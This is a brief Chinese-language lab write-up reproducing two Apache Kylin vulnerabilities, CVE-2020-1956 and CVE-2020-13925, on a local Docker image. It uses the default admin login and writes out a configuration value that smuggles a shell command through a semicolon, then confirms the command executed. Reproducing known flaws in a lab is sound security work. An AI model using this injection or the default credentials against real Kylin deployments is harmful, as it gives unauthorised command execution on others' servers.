参考:https://paper.seebug.org/1237/
http://www.ijiandao.com/2b/baijia/373874.html
这两个都是Kylin下的漏洞,放在一起复现了
环境:Kylin 官网文档 http://kylin.apache.org/cn/docs/install/kylin_docker.html
0x1 docker里下环境
0x2 运行docker
docker run -d \
-m 8G \
-p 7070:7070 \
-p 8088:8088 \
-p 50070:50070 \
-p 8032:8032 \
-p 8042:8042 \
-p 16010:16010 \
apachekylin/apache-kylin-standalone:3.0.1
注意:login的页面要等一会儿才能出来(一开始一直没有页面还以为是哪里有问题查了一会儿…
0x3 使用默认密码 admin/KYLIN 登录
0x01 Cve-2020-1956:
0x001 修改配置:
kylin.tool.auuto-migrate-cube.enabled=true
kylin.tool.auto-migrate-cube.src-config=/home/admin/apache-kylin-3.0.1-bin-hbase1x/conf/kylin.propertie
kylin.server.cluster-name=kylin_metadata
kylin.tool.auto-migrate-cube.dest-config=/tmp/kylin.properties kylin_streaming_cube learn_kylin true true true true;touch /tmp/kami;echo
0x002 发包,可以看到返回200
0x003 进入查看(docker exec -it bash),可以看到我们写进配置的语句被执行了,生成文件成功
0x02 Cve-2020-13925:
0x001 选择一个项目,点击diagnosis,抓包
0x002 改包,即可
这里有一个额外的知识:关于burp的collaborator模块
参考:https://github.com/0xs1riu5/Writeup